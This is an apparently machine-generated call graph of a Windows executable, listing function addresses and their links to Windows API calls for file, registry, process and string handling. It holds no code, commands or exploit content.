91953->92472 91955 3fa5c7 91954->91955 91957 3fa607 91954->91957 91955->91811 91956 3fa625 91956->91955 91958 37c92d 39 API calls 91956->91958 91960 3fa682 91956->91960 91957->91956 91959 37c92d 39 API calls 91957->91959 91958->91960 91959->91956 92516 3e0287 91960->92516 91963 378e70 52 API calls 91962->91963 91964 3fac65 91963->91964 92587 3ddc9c CreateToolhelp32Snapshot Process32FirstW 91964->92587 91966 3fac74 91966->91811 91968 37b3fe 8 API calls 91967->91968 91969 3ede70 91968->91969 92605 3e183b 91969->92605 91971 3ede78 91971->91811 92630 3f88b6 91972->92630 91974 3f9efa 91974->91811 91976 3fa90a 91975->91976 91982 3fa8ca 91975->91982 91977 3fa928 91976->91977 91979 37c92d 39 API calls 91976->91979 91978 37c92d 39 API calls 91977->91978 91980 3fa990 91977->91980 91977->91982 91978->91980 91979->91977 91981 3e0287 58 API calls 91980->91981 91981->91982 91982->91811 91984 3de9d1 91983->91984 91984->91811 91986 37c92d 39 API calls 91985->91986 91987 38f972 91986->91987 91988 38f97a timeGetTime 91987->91988 91989 3cfac0 Sleep 91987->91989 91990 37c92d 39 API calls 91988->91990 91991 38f990 91990->91991 91991->91811 91993 37795d 91992->91993 91994 37796c 91992->91994 91993->91811 91994->91993 91995 377971 CloseHandle 91994->91995 91995->91993 91997 378e70 52 API calls 91996->91997 91998 3e4ae8 91997->91998 92745 3dda81 91998->92745 92000 3e4af0 92000->91811 92002 37bf07 8 API calls 92001->92002 92003 3e9607 92002->92003 92004 378e70 52 API calls 92003->92004 92005 3e9616 92004->92005 92006 37557e 9 API calls 92005->92006 92007 3e9621 92006->92007 92008 378e70 52 API calls 92007->92008 92009 3e962e 92008->92009 92010 378e70 52 API calls 92009->92010 92011 3e9640 92010->92011 92012 378e70 52 API calls 92011->92012 92013 3e9655 WritePrivateProfileStringW 92012->92013 92014 3e966b WritePrivateProfileStringW 92013->92014 92015 3e9677 92013->92015 92014->92015 92015->91811 92017 37bf07 8 API calls 92016->92017 92018 3e8e4a 92017->92018 92019 39019b 8 API calls 92018->92019 92020 3e8e54 92019->92020 92757 3741a6 92020->92757 92023 378e70 52 API calls 92024 3e8e6d 92023->92024 92025 37557e 9 API calls 92024->92025 92026 3e8e78 92025->92026 92027 378e70 52 API calls 92026->92027 92028 3e8e85 92027->92028 92029 378e70 52 API calls 92028->92029 92030 3e8e97 92029->92030 92031 378e70 52 API calls 92030->92031 92032 3e8eac GetPrivateProfileStringW 92031->92032 92033 376ab6 8 API calls 92032->92033 92034 3e8ecf messages 92033->92034 92034->91811 92036 378e70 52 API calls 92035->92036 92037 3e65c7 92036->92037 92038 3de387 4 API calls 92037->92038 92039 3e65d1 92038->92039 92039->91811 92041 37bf07 8 API calls 92040->92041 92042 3fcd39 92041->92042 92043 37bf07 8 API calls 92042->92043 92044 3fcd42 92043->92044 92045 37bf07 8 API calls 92044->92045 92046 3fcd4b 92045->92046 92047 378e70 52 API calls 92046->92047 92055 3fcdda 92046->92055 92048 3fcd71 92047->92048 92760 3fd6b1 92048->92760 92050 3fcda5 92786 3fd2f7 92050->92786 92052 3fcdd6 92053 3fce0f RegConnectRegistryW 92052->92053 92054 3fce76 RegCreateKeyExW 92052->92054 92052->92055 92053->92054 92053->92055 92057 3fcf0e 92054->92057 92066 3fcead 92054->92066 92055->91811 92058 3fd1d6 RegCloseKey 92057->92058 92060 378e70 52 API calls 92057->92060 92058->92055 92059 3fd1e9 RegCloseKey 92058->92059 92059->92055 92061 3fcf29 92060->92061 92062 394db8 40 API calls 92061->92062 92066->92055 92068 3fceff RegCloseKey 92066->92068 92068->92055 92133 3fa4c7 92129->92133 92130 378e70 52 API calls 92131 3fa534 92130->92131 92798 3e17be 92131->92798 92133->92130 92134 3fa4d6 92133->92134 92134->91811 92136 376ab6 8 API calls 92135->92136 92137 38be8d 92136->92137 92139 39016b 8 API calls 92137->92139 92142 3c8f7a 92137->92142 92140 38bea6 92139->92140 92141 39019b 8 API calls 92140->92141 92144 38beb7 92141->92144 92143 38bf1f 92142->92143 92885 3ea607 39 API calls 92142->92885 92147 37c92d 39 API calls 92143->92147 92151 38bf2c 92143->92151 92145 377953 CloseHandle 92144->92145 92146 38bec2 92145->92146 92148 37bf07 8 API calls 92146->92148 92149 3c8fdc 92147->92149 92150 38beca 92148->92150 92149->92151 92152 3c8fe4 92149->92152 92153 377953 CloseHandle 92150->92153 92862 38fdc9 92151->92862 92155 37c92d 39 API calls 92152->92155 92156 38bed1 92153->92156 92160 38bf33 92155->92160 92157 378e70 52 API calls 92156->92157 92158 38bedd 92157->92158 92159 377953 CloseHandle 92158->92159 92161 38bee7 92159->92161 92162 3c8ff9 92160->92162 92163 38bf4e 92160->92163 92839 376e52 92161->92839 92166 39019b 8 API calls 92162->92166 92165 377a14 8 API calls 92163->92165 92169 38bf56 92165->92169 92167 3c8ffe 92166->92167 92171 3c9012 92167->92171 92886 3741c9 92167->92886 92867 38bfbc 92169->92867 92176 3e1759 8 API calls 92171->92176 92182 3c9016 __fread_nolock 92171->92182 92172 38bf00 92847 376b12 92172->92847 92173 3c8f72 92884 377923 CloseHandle messages 92173->92884 92174 38bf65 92179 377a59 8 API calls 92174->92179 92174->92182 92176->92182 92183 38bf79 92179->92183 92180 38bf0e 92881 376afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 92180->92881 92186 38bfb3 92183->92186 92187 377953 CloseHandle 92183->92187 92184 3c8f3b 92883 3dd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 92184->92883 92185 38bf15 92185->92143 92185->92184 92186->91811 92189 38bfa7 92187->92189 92189->92186 92882 377923 CloseHandle messages 92189->92882 92190 3c8f52 92190->92143 92193 3e5fbd 92192->92193 92194 3e5ef4 92192->92194 92197 378e70 52 API calls 92193->92197 92206 3e6011 92193->92206 92195 37c92d 39 API calls 92194->92195 92196 3e5eff 92195->92196 92198 37c92d 39 API calls 92196->92198 92199 3e5fef 92197->92199 92200 3e5f15 92198->92200 92201 378e70 52 API calls 92199->92201 92200->92193 92203 37bf07 8 API calls 92200->92203 92202 3e6001 92201->92202 92953 3dd836 92202->92953 92205 3e5f26 92203->92205 92207 37bf07 8 API calls 92205->92207 92206->91811 92208 3e5f2f 92207->92208 92209 378e70 52 API calls 92208->92209 92210 3e5f3c 92209->92210 92211 37694e 8 API calls 92210->92211 92212 3e5f4f 92211->92212 92213 377af4 8 API calls 92212->92213 92214 3e5f60 92213->92214 92215 3e5f89 92214->92215 92996 3ddc8e 92214->92996 92218 37c92d 39 API calls 92215->92218 92218->92193 92219 37b25f 8 API calls 92220 3e5f80 92219->92220 92221 3dda81 12 API calls 92220->92221 92221->92215 92223 378e70 52 API calls 92222->92223 92224 3e6d47 92223->92224 92225 3e6d84 92224->92225 92227 37c92d 39 API calls 92224->92227 93066 3de783 92225->93066 92228 3e6d76 92227->92228 92228->92225 92229 37557e 9 API calls 92228->92229 92229->92225 92231 377a59 8 API calls 92233 3e6dd7 92231->92233 92232 378e70 52 API calls 92234 3e6d92 92232->92234 92233->91811 92234->92231 92235->91813 92236->91771 92237->91779 92238->91799 92239->91799 92240->91773 92241->91808 92242->91808 92243->91808 92244->91806 92245->91808 92246->91879 92247->91880 92248->91881 92249->91876 92251 37bf07 8 API calls 92250->92251 92252 3ddb88 92251->92252 92253 37bf07 8 API calls 92252->92253 92254 3ddb91 92253->92254 92255 37bf07 8 API calls 92254->92255 92256 3ddb9a 92255->92256 92275 37557e 92256->92275 92259 3de9c5 GetFileAttributesW 92260 3ddbae 92259->92260 92261 3ddbc0 92260->92261 92262 3765a4 8 API calls 92260->92262 92285 37694e 92261->92285 92262->92261 92345 3b22f0 92275->92345 92278 3755c5 92351 37bceb 92278->92351 92279 3755aa 92280 3784b7 8 API calls 92279->92280 92282 3755b6 92280->92282 92347 3779ed 92282->92347 92286 37bf07 8 API calls 92285->92286 92287 376964 92286->92287 92288 37bf07 8 API calls 92287->92288 92289 37696c 92288->92289 92290 37bf07 8 API calls 92289->92290 92291 376974 92290->92291 92292 37bf07 8 API calls 92291->92292 92293 37697c 92292->92293 92294 3769b0 92293->92294 92295 3b5725 92293->92295 92296 378685 8 API calls 92294->92296 92297 37be6d 8 API calls 92295->92297 92299 3769be 92296->92299 92298 3b572e 92297->92298 92300 37bceb 8 API calls 92298->92300 92301 3796d9 8 API calls 92299->92301 92303 3769f3 92300->92303 92302 3769c8 92301->92302 92302->92303 92304 378685 8 API calls 92302->92304 92305 376a14 92303->92305 92319 376a38 92303->92319 92322 3b5750 92303->92322 92307 3769e9 92304->92307 92305->92319 92370 37627c 92305->92370 92308 3796d9 8 API calls 92307->92308 92308->92303 92310 3784b7 8 API calls 92324 3b5810 92310->92324 92318 378685 8 API calls 92318->92319 92357 378685 92319->92357 92322->92310 92323 37627c 8 API calls 92323->92324 92324->92319 92324->92323 92373 37acc0 8 API calls __fread_nolock 92324->92373 92346 37558b GetFullPathNameW 92345->92346 92346->92278 92346->92279 92348 3779fb 92347->92348 92349 3796d9 8 API calls 92348->92349 92350 3755c2 92349->92350 92350->92259 92352 37bd05 92351->92352 92353 37bcf8 92351->92353 92354 39016b 8 API calls 92352->92354 92353->92282 92355 37bd0f 92354->92355 92356 39019b 8 API calls 92355->92356 92356->92353 92358 378694 92357->92358 92359 3786f1 92357->92359 92358->92359 92360 37869f 92358->92360 92361 3796d9 8 API calls 92359->92361 92367 3786c2 __fread_nolock 92361->92367 92371 37c269 8 API calls 92370->92371 92372 376287 92371->92372 92372->92318 92372->92319 92373->92324 92402 39019b 8 API calls 92401->92402 92403 377a39 92402->92403 92404 39016b 8 API calls 92403->92404 92405 377a47 92404->92405 92405->91898 92407 37bf07 8 API calls 92406->92407 92408 3d9b6d 92407->92408 92409 377a14 8 API calls 92408->92409 92410 3d9b81 92409->92410 92411 3d96e3 41 API calls 92410->92411 92416 3d9ba3 92410->92416 92413 3d9b9d 92411->92413 92415 378685 8 API calls 92413->92415 92413->92416 92414 378685 8 API calls 92414->92416 92415->92416 92416->92414 92417 3d9c42 92416->92417 92418 377af4 8 API calls 92416->92418 92421 3d9c26 92416->92421 92450 3d96e3 92416->92450 92419 37be6d 8 API calls 92417->92419 92420 3d9c51 92417->92420 92418->92416 92419->92420 92420->91922 92422 378685 8 API calls 92421->92422 92423 3d9c36 92422->92423 92424 377af4 8 API calls 92423->92424 92424->92417 92426 37c93e 92425->92426 92428 37c945 92425->92428 92426->92428 92463 396661 39 API calls 92426->92463 92428->91905 92429 37c988 92429->91905 92431 3b587b 92430->92431 92434 376ac6 92430->92434 92432 3784b7 8 API calls 92431->92432 92435 3b588c 92431->92435 92432->92435 92433 37bceb 8 API calls 92436 3b5896 92433->92436 92437 39016b 8 API calls 92434->92437 92435->92433 92436->92436 92438 376ad9 92437->92438 92439 376af4 92438->92439 92440 376ae2 92438->92440 92441 37bf07 8 API calls 92439->92441 92442 37b25f 8 API calls 92440->92442 92443 376aea 92441->92443 92442->92443 92443->91920 92445 377a65 92444->92445 92446 377a9e 92444->92446 92449 39016b 8 API calls 92445->92449 92447 377a78 92446->92447 92448 37be6d 8 API calls 92446->92448 92447->91920 92448->92447 92449->92447 92451 3d9703 _wcslen 92450->92451 92454 3d9738 92451->92454 92455 3d97f7 92451->92455 92456 3d97f2 92451->92456 92453 38e2e5 41 API calls 92453->92455 92454->92456 92457 38e2e5 92454->92457 92455->92453 92455->92456 92456->92416 92458 38e2f4 CompareStringW 92457->92458 92462 3ce463 92457->92462 92460 38e319 92458->92460 92460->92454 92461 39e24b 40 API calls 92461->92462 92462->92460 92462->92461 92463->92429 92486 39d6be 92464->92486 92468 3de3a5 GetFileAttributesW 92467->92468 92469 3de3cf 92467->92469 92468->92469 92470 3de3b1 FindFirstFileW 92468->92470 92469->91940 92469->91944 92470->92469 92471 3de3c2 FindClose 92470->92471 92471->92469 92473 3ea03a FindClose 92472->92473 92474 3e9fc9 92472->92474 92475 3ea04b FindFirstFileW 92473->92475 92476 3ea0e2 92473->92476 92477 3ea028 FindNextFileW 92474->92477 92480 3e9ff7 GetFileAttributesW SetFileAttributesW 92474->92480 92483 3ea060 92475->92483 92484 3ea0d9 FindClose 92475->92484 92476->91952 92477->92473 92477->92474 92479 3ea0c7 FindNextFileW 92479->92483 92479->92484 92480->92474 92481 3ea0eb FindClose 92480->92481 92481->92476 92482 3ea0a0 SetCurrentDirectoryW 92482->92483 92483->92479 92483->92482 92483->92484 92485 3ea0c0 SetCurrentDirectoryW 92483->92485 92484->92476 92485->92479 92487 39d89f 92486->92487 92488 39d6d5 92486->92488 92514 39f669 20 API calls _free 92487->92514 92488->92487 92492 39d740 92488->92492 92490 39d8af 92515 3a2b7c 26 API calls __cftof 92490->92515 92493 39d764 92492->92493 92495 39d78b 92492->92495 92509 3a5153 26 API calls 2 library calls 92492->92509 92508 39f669 20 API calls _free 92493->92508 92495->92493 92502 39d7fd 92495->92502 92510 3a5153 26 API calls 2 library calls 92495->92510 92497 39d868 92497->92493 92500 39d774 92497->92500 92501 39d87b 92497->92501 92498 39d820 92498->92493 92499 39d841 92498->92499 92511 3a5153 26 API calls 2 library calls 92498->92511 92499->92493 92499->92500 92505 39d857 92499->92505 92500->91937 92513 3a5153 26 API calls 2 library calls 92501->92513 92502->92497 92502->92498 92512 3a5153 26 API calls 2 library calls 92505->92512 92508->92500 92509->92495 92510->92502 92511->92499 92512->92500 92513->92500 92514->92490 92515->92500 92548 3e01bf 92516->92548 92519 3e0308 92564 3e04fe 56 API calls __fread_nolock 92519->92564 92520 3e0320 92522 3e0386 92520->92522 92525 3e0330 92520->92525 92523 3e041c 92522->92523 92524 3e03b6 92522->92524 92540 3e02ae __fread_nolock 92522->92540 92528 3e04c5 92523->92528 92529 3e0425 92523->92529 92526 3e03bb 92524->92526 92527 3e03e6 92524->92527 92547 3e0368 92525->92547 92565 3e276a 10 API calls 92525->92565 92526->92540 92568 37c9fb 39 API calls 92526->92568 92527->92540 92569 37c9fb 39 API calls 92527->92569 92528->92540 92573 37c5df 39 API calls 92528->92573 92530 3e042a 92529->92530 92531 3e04a2 92529->92531 92536 3e0469 92530->92536 92537 3e0430 92530->92537 92531->92540 92572 37c5df 39 API calls 92531->92572 92536->92540 92571 37c5df 39 API calls 92536->92571 92537->92540 92570 37c5df 39 API calls 92537->92570 92540->91955 92543 3e033c 92566 3e276a 10 API calls 92543->92566 92545 3e0353 __fread_nolock 92567 3e276a 10 API calls 92545->92567 92555 3e1759 92547->92555 92549 3e020c 92548->92549 92553 3e01d0 92548->92553 92551 37c92d 39 API calls 92549->92551 92550 3e020a 92550->92519 92550->92520 92550->92540 92551->92550 92552 378e70 52 API calls 92552->92553 92553->92550 92553->92552 92574 394db8 92553->92574 92556 3e1764 92555->92556 92557 39016b 8 API calls 92556->92557 92558 3e176b 92557->92558 92559 3e1798 92558->92559 92560 3e1777 92558->92560 92562 39019b 8 API calls 92559->92562 92561 39019b 8 API calls 92560->92561 92563 3e1780 ___scrt_fastfail 92561->92563 92562->92563 92563->92540 92564->92540 92565->92543 92566->92545 92567->92547 92568->92540 92569->92540 92570->92540 92571->92540 92572->92540 92573->92540 92575 394e3b 92574->92575 92576 394dc6 92574->92576 92586 394e4d 40 API calls 2 library calls 92575->92586 92583 394deb 92576->92583 92584 39f669 20 API calls _free 92576->92584 92579 394e48 92579->92553 92580 394dd2 92585 3a2b7c 26 API calls __cftof 92580->92585 92582 394ddd 92582->92553 92583->92553 92584->92580 92585->92582 92586->92579 92597 3de723 92587->92597 92589 3ddce9 Process32NextW 92590 3ddd9b CloseHandle 92589->92590 92592 3ddce2 92589->92592 92590->91966 92591 37bf07 8 API calls 92591->92592 92592->92589 92592->92590 92592->92591 92593 37b25f 8 API calls 92592->92593 92594 37694e 8 API calls 92592->92594 92595 377af4 8 API calls 92592->92595 92596 38e2e5 41 API calls 92592->92596 92593->92592 92594->92592 92595->92592 92596->92592 92601 3de72e 92597->92601 92598 3de745 92604 39668b 39 API calls 92598->92604 92601->92598 92602 3de74b 92601->92602 92603 396742 GetStringTypeW 92601->92603 92602->92592 92603->92601 92604->92602 92606 3e1852 92605->92606 92621 3e196b 92605->92621 92607 3e1872 92606->92607 92609 3e189f 92606->92609 92610 3e18b6 92606->92610 92607->92609 92611 3e1886 92607->92611 92608 39019b 8 API calls 92623 3e1894 __fread_nolock 92608->92623 92609->92608 92613 39019b 8 API calls 92610->92613 92619 3e18d3 92610->92619 92614 39019b 8 API calls 92611->92614 92612 3e18fa 92615 39019b 8 API calls 92612->92615 92613->92619 92614->92623 92616 3e1900 92615->92616 92624 38c1f1 92616->92624 92617 39016b 8 API calls 92617->92621 92619->92611 92619->92612 92619->92623 92621->91971 92623->92617 92625 39019b 8 API calls 92624->92625 92626 38c208 92625->92626 92627 39016b 8 API calls 92626->92627 92628 38c214 92627->92628 92629 38f9e2 10 API calls 92628->92629 92629->92623 92631 378e70 52 API calls 92630->92631 92632 3f88ed 92631->92632 92656 3f8932 messages 92632->92656 92668 3f9632 92632->92668 92634 3f8bde 92635 3f8dac 92634->92635 92639 3f8bec 92634->92639 92724 3f9843 59 API calls 92635->92724 92638 3f8dbb 92638->92639 92640 3f8dc7 92638->92640 92681 3f87e3 92639->92681 92640->92656 92641 378e70 52 API calls 92660 3f89a6 92641->92660 92646 3f8c25 92695 390000 92646->92695 92649 3f8c5f 92699 377d51 92649->92699 92650 3f8c45 92723 3e3ef6 81 API calls __wsopen_s 92650->92723 92653 3f8c50 GetCurrentProcess TerminateProcess 92653->92649 92656->91974 92658 3f8e22 92658->92656 92663 3f8e36 FreeLibrary 92658->92663 92659 381c50 8 API calls 92661 3f8c9e 92659->92661 92660->92634 92660->92641 92660->92656 92721 3d4a0c 8 API calls __fread_nolock 92660->92721 92722 3f8e7c 41 API calls 92660->92722 92664 3f94da 74 API calls 92661->92664 92662 381c50 8 API calls 92666 3f8caf 92662->92666 92663->92656 92664->92666 92666->92658 92666->92662 92667 37b3fe 8 API calls 92666->92667 92710 3f94da 92666->92710 92667->92666 92669 37c269 8 API calls 92668->92669 92670 3f964d CharLowerBuffW 92669->92670 92671 3d96e3 41 API calls 92670->92671 92672 3f966e 92671->92672 92674 37bf07 8 API calls 92672->92674 92680 3f96a7 _wcslen 92672->92680 92675 3f9689 92674->92675 92676 378685 8 API calls 92675->92676 92677 3f969d 92676->92677 92678 3796d9 8 API calls 92677->92678 92678->92680 92679 3f97bd _wcslen 92679->92660 92680->92679 92725 3f8e7c 41 API calls 92680->92725 92682 3f87fe 92681->92682 92686 3f8849 92681->92686 92683 39019b 8 API calls 92682->92683 92684 3f8820 92683->92684 92685 39016b 8 API calls 92684->92685 92684->92686 92685->92684 92687 3f99f5 92686->92687 92688 3f9c0a messages 92687->92688 92693 3f9a19 _strcat _wcslen ___std_exception_copy 92687->92693 92688->92646 92689 37c92d 39 API calls 92689->92693 92690 37c5df 39 API calls 92690->92693 92691 37c9fb 39 API calls 92691->92693 92692 378e70 52 API calls 92692->92693 92693->92688 92693->92689 92693->92690 92693->92691 92693->92692 92726 3df7da 10 API calls _wcslen 92693->92726 92697 390015 92695->92697 92696 3900ad ResumeThread 92698 39007b 92696->92698 92697->92696 92697->92698 92698->92649 92698->92650 92700 377d59 92699->92700 92701 39016b 8 API calls 92700->92701 92702 377d67 92701->92702 92727 378386 92702->92727 92705 3783b0 92730 37c700 92705->92730 92707 39019b 8 API calls 92709 37845c 92707->92709 92708 3783c0 92708->92707 92708->92709 92709->92659 92709->92666 92711 3f94f2 92710->92711 92717 3f950e 92710->92717 92712 3f951a 92711->92712 92713 3f94f9 92711->92713 92714 3f95c3 92711->92714 92711->92717 92743 3df3fd 10 API calls _strlen 92713->92743 92717->92666 92721->92660 92722->92660 92723->92653 92724->92638 92725->92679 92726->92693 92728 39016b 8 API calls 92727->92728 92729 377d6f 92728->92729 92729->92705 92731 37c70b 92730->92731 92732 3c1228 92731->92732 92737 37c713 messages 92731->92737 92733 39016b 8 API calls 92732->92733 92735 3c1234 92733->92735 92734 37c71a 92734->92708 92737->92734 92738 37c780 92737->92738 92739 37c78b messages 92738->92739 92741 37c7c6 messages 92739->92741 92742 38e29c 8 API calls messages 92739->92742 92741->92737 92742->92741 92746 3779ed 8 API calls 92745->92746 92747 3ddab6 GetFileAttributesW 92746->92747 92748 3ddaca GetLastError 92747->92748 92751 3ddae3 92747->92751 92749 3ddad7 CreateDirectoryW 92748->92749 92750 3ddae5 92748->92750 92749->92750 92749->92751 92750->92751 92752 3796d9 8 API calls 92750->92752 92751->92000 92753 3ddb27 92752->92753 92754 3dda81 8 API calls 92753->92754 92755 3ddb30 92754->92755 92755->92751 92756 3ddb34 CreateDirectoryW 92755->92756 92756->92751 92758 39016b 8 API calls 92757->92758 92759 3741b8 92758->92759 92759->92023 92761 37bceb 8 API calls 92760->92761 92762 3fd6bf 92761->92762 92763 37bceb 8 API calls 92762->92763 92764 3fd6c7 92763->92764 92765 37bceb 8 API calls 92764->92765 92766 3fd6cf 92765->92766 92767 3fd737 92766->92767 92768 37627c 8 API calls 92766->92768 92769 37bceb 8 API calls 92767->92769 92770 3fd6e5 92768->92770 92773 3fd735 92769->92773 92770->92767 92771 37627c 8 API calls 92770->92771 92772 3fd6f7 92771->92772 92772->92767 92774 3fd6fc 92772->92774 92775 378685 8 API calls 92773->92775 92776 3796d9 8 API calls 92774->92776 92777 3fd760 92775->92777 92782 3fd707 92776->92782 92778 378685 8 API calls 92777->92778 92779 3fd777 92778->92779 92780 3779ed 8 API calls 92779->92780 92781 3fd780 92780->92781 92781->92050 92783 378685 8 API calls 92782->92783 92784 3fd728 92783->92784 92785 3796d9 8 API calls 92784->92785 92785->92773 92787 37c269 8 API calls 92786->92787 92788 3fd30e CharUpperBuffW 92787->92788 92789 3fd329 92788->92789 92790 37bf07 8 API calls 92789->92790 92791 3fd334 92790->92791 92792 378685 8 API calls 92791->92792 92793 3fd347 _wcslen 92792->92793 92794 3779ed 8 API calls 92793->92794 92795 3fd3a4 _wcslen 92793->92795 92794->92795 92795->92052 92799 3e17cb 92798->92799 92800 39016b 8 API calls 92799->92800 92801 3e17d2 92800->92801 92804 3dfbca 92801->92804 92803 3e180c 92803->92134 92805 37c269 8 API calls 92804->92805 92806 3dfbdd CharLowerBuffW 92805->92806 92809 3dfbf0 92806->92809 92807 3dfbfa ___scrt_fastfail 92807->92803 92808 3dfc2e 92810 3dfc40 92808->92810 92812 37627c 8 API calls 92808->92812 92809->92807 92809->92808 92811 37627c 8 API calls 92809->92811 92813 39019b 8 API calls 92810->92813 92811->92809 92812->92810 92814 3dfc6e 92813->92814 92815 3dfc90 92814->92815 92837 3dfb02 8 API calls 92814->92837 92822 3dfd21 92815->92822 92818 3dfccd 92818->92807 92819 39016b 8 API calls 92818->92819 92820 3dfce7 92819->92820 92821 39019b 8 API calls 92820->92821 92821->92807 92823 37bf07 8 API calls 92822->92823 92824 3dfd53 92823->92824 92825 37bf07 8 API calls 92824->92825 92826 3dfd5c 92825->92826 92827 37bf07 8 API calls 92826->92827 92834 3dfd65 92827->92834 92828 3784b7 8 API calls 92828->92834 92829 3e0029 92829->92818 92830 396718 GetStringTypeW 92830->92834 92832 396661 39 API calls 92832->92834 92833 3dfd21 40 API calls 92833->92834 92834->92828 92834->92829 92834->92830 92834->92832 92834->92833 92835 37acc0 8 API calls 92834->92835 92836 37be6d 8 API calls 92834->92836 92838 396742 GetStringTypeW 92834->92838 92835->92834 92836->92834 92837->92814 92838->92834 92840 3b5985 92839->92840 92841 376e69 CreateFileW 92839->92841 92842 376e88 92840->92842 92843 3b598b CreateFileW 92840->92843 92841->92842 92842->92172 92842->92173 92843->92842 92844 3b59b3 92843->92844 92889 376bfa 92844->92889 92848 376b27 92847->92848 92861 376b24 messages 92847->92861 92849 376bfa 3 API calls 92848->92849 92848->92861 92850 376b44 92849->92850 92851 3b589b 92850->92851 92852 376b51 92850->92852 92853 38fdc9 3 API calls 92851->92853 92854 39019b 8 API calls 92852->92854 92853->92861 92855 376b5d 92854->92855 92856 3741a6 8 API calls 92855->92856 92857 376b67 92856->92857 92895 37b050 92857->92895 92860 376bfa 3 API calls 92860->92861 92861->92180 92863 376bfa 3 API calls 92862->92863 92864 38fde7 92863->92864 92865 376bfa 3 API calls 92864->92865 92866 38fe08 92865->92866 92866->92160 92868 38c003 92867->92868 92869 38bfc7 92867->92869 92870 37bceb 8 API calls 92868->92870 92869->92868 92871 38bfd6 92869->92871 92879 3dd2ab 92870->92879 92873 38bfeb 92871->92873 92875 38bff8 92871->92875 92872 3dd2da 92872->92174 92902 38c009 92873->92902 92909 3dd3b2 12 API calls 92875->92909 92877 38bff4 92877->92174 92879->92872 92910 3dd249 92879->92910 92917 37acc0 8 API calls __fread_nolock 92879->92917 92881->92185 92882->92186 92883->92190 92884->92142 92885->92142 92887 37b050 2 API calls 92886->92887 92888 3741da 92887->92888 92888->92171 92894 376c11 92889->92894 92890 3b58ec SetFilePointerEx 92891 376c98 SetFilePointerEx SetFilePointerEx 92893 376c64 92891->92893 92892 3b58db 92892->92890 92893->92842 92894->92890 92894->92891 92894->92892 92894->92893 92896 37b0cb 92895->92896 92900 37b05e 92895->92900 92901 38f13c SetFilePointerEx 92896->92901 92898 376b73 92898->92860 92899 37b09c ReadFile 92899->92898 92899->92900 92900->92898 92900->92899 92901->92900 92903 38c1f1 8 API calls 92902->92903 92904 38c021 92903->92904 92918 37adc1 92904->92918 92908 38c03c 92908->92877 92909->92877 92911 3dd26a 92910->92911 92912 3dd253 92910->92912 92914 37b050 2 API calls 92911->92914 92912->92911 92913 3dd259 92912->92913 92915 37b050 2 API calls 92913->92915 92916 3dd263 92914->92916 92915->92916 92916->92879 92917->92879 92932 38feaa 92918->92932 92920 37add2 92921 37b050 2 API calls 92920->92921 92922 37ae07 92920->92922 92939 37b0e3 8 API calls __fread_nolock 92920->92939 92921->92920 92922->92908 92924 378774 MultiByteToWideChar 92922->92924 92925 3787e7 92924->92925 92926 3787a0 92924->92926 92928 37bceb 8 API calls 92925->92928 92927 39019b 8 API calls 92926->92927 92929 3787b5 MultiByteToWideChar 92927->92929 92931 3787db 92928->92931 92940 3787f0 92929->92940 92931->92908 92933 38febb 92932->92933 92934 3cfe13 92932->92934 92933->92920 92935 39016b 8 API calls 92934->92935 92936 3cfe1d 92935->92936 92937 39019b 8 API calls 92936->92937 92938 3cfe32 92937->92938 92939->92920 92941 378884 92940->92941 92942 378803 92940->92942 92943 3796d9 8 API calls 92941->92943 92942->92941 92945 37880f 92942->92945 92944 378821 __fread_nolock 92943->92944 92944->92931 92946 378847 92945->92946 92947 378819 92945->92947 92948 39016b 8 API calls 92946->92948 92952 378894 8 API calls 92947->92952 92950 378851 92948->92950 92951 39019b 8 API calls 92950->92951 92951->92944 92952->92944 92954 37bf07 8 API calls 92953->92954 92955 3dd853 92954->92955 92956 37bf07 8 API calls 92955->92956 92957 3dd85b 92956->92957 92958 37bf07 8 API calls 92957->92958 92959 3dd863 92958->92959 92960 37557e 9 API calls 92959->92960 92961 3dd86d 92960->92961 92962 37557e 9 API calls 92961->92962 92963 3dd877 92962->92963 92999 3de958 92963->92999 92965 3dd882 92966 3de9c5 GetFileAttributesW 92965->92966 92967 3dd88d 92966->92967 92968 3dd89f 92967->92968 92969 3765a4 8 API calls 92967->92969 92970 3de9c5 GetFileAttributesW 92968->92970 92969->92968 92971 3dd8a7 92970->92971 92972 3dd8b4 92971->92972 92974 3765a4 8 API calls 92971->92974 92973 37bf07 8 API calls 92972->92973 92975 3dd8bc 92973->92975 92974->92972 92976 37bf07 8 API calls 92975->92976 92977 3dd8c4 92976->92977 92978 37694e 8 API calls 92977->92978 92979 3dd8d5 FindFirstFileW 92978->92979 92980 3dda23 FindClose 92979->92980 92992 3dd8f8 92979->92992 92992->92980 92997 3de387 4 API calls 92996->92997 92998 3ddc95 92997->92998 92998->92215 92998->92219 93000 37bf07 8 API calls 92999->93000 93001 3de96d 93000->93001 93002 37bf07 8 API calls 93001->93002 93003 3de975 93002->93003 93004 37694e 8 API calls 93003->93004 93005 3de984 93004->93005 93006 37694e 8 API calls 93005->93006 93007 3de994 93006->93007 93008 38e2e5 41 API calls 93007->93008 93009 3de9a9 93008->93009 93009->92965 93067 3b22f0 __wsopen_s 93066->93067 93068 3de790 GetShortPathNameW 93067->93068 93069 3784b7 8 API calls 93068->93069 93070 3de7b8 93069->93070 93070->92232 93070->92234 93071->91845 93072->91845 93073->91844 93074->91848 93075 3a8792 93080 3a854e 93075->93080 93078 3a87ba 93085 3a857f try_get_first_available_module 93080->93085 93082 3a877e 93104 3a2b7c 26 API calls __cftof 93082->93104 93084 3a86d3 93084->93078 93092 3b0d24 93084->93092 93091 3a86c8 93085->93091 93095 39919b 93085->93095 93088 39919b 40 API calls 93089 3a873b 93088->93089 93090 39919b 40 API calls 93089->93090 93089->93091 93090->93091 93091->93084 93103 39f669 20 API calls _free 93091->93103 93108 3b0421 93092->93108 93094 3b0d3f 93094->93078 93096 39923b 93095->93096 93098 3991af 93095->93098 93107 399253 40 API calls 2 library calls 93096->93107 93100 3991d1 93098->93100 93105 39f669 20 API calls _free 93098->93105 93100->93088 93100->93091 93101 3991c6 93106 3a2b7c 26 API calls __cftof 93101->93106 93103->93082 93104->93084 93105->93101 93106->93100 93107->93100 93111 3b042d ___DestructExceptionObject 93108->93111 93109 3b043b 93165 39f669 20 API calls _free 93109->93165 93111->93109 93113 3b0474 93111->93113 93112 3b0440 93166 3a2b7c 26 API calls __cftof 93112->93166 93119 3b09fb 93113->93119 93118 3b044a __wsopen_s 93118->93094 93120 3b0a18 93119->93120 93121 3b0a2d 93120->93121 93122 3b0a46 93120->93122 93182 39f656 20 API calls _free 93121->93182 93168 3a55b1 